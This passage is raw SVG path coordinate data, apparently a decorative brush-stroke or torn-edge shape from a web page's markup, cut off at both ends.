,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path 